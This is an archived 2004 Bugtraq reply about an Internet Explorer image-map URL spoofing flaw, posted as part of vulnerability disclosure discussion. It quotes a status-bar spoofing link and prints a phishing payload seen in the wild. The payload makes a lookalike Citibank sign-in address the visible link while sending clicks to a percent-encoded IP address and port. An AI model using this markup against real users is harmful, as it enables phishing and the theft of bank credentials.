lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 3 Jun 2004 09:54:09 -0400
From: "James C Slora Jr" <Jim.Slora@...a.com>
To: <bugtraq@...urityfocus.com>
Subject: RE: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability


> <a onmouseover="window.status='http://www.the-url-you-
> see.com;return true" 
> title="The Link"
> onmouseout="window.status='Whatever-you-like-here';return true"
> href='http://www.some-other-url.com'>The link</a>
> 
> 
>  -->
> 
> the point of the exercise is that default settings for the 
> most popular MUA's out there today have scripting disabled.

True. This works better. From the wild.

A
HREF="https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp"><
map name="FPMap0"><area coords="0, 0, 610, 275" shape="rect"
href="http://%32%31%37%2E%33%37%2E%32%31%31%2E%32%35%30:%34%39%30%33/%63%69%
74/%69%6E%64%65%78%2E%68%74%6D"></map><img
SRC="cid:part1.07010704.01060800@...r-billing47@...ibank.com" border="0"
usemap="#FPMap0"</A>

The cid reference points to an embedded GIF that looks like hyperlinked text
https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp



Powered by blists - more mailing lists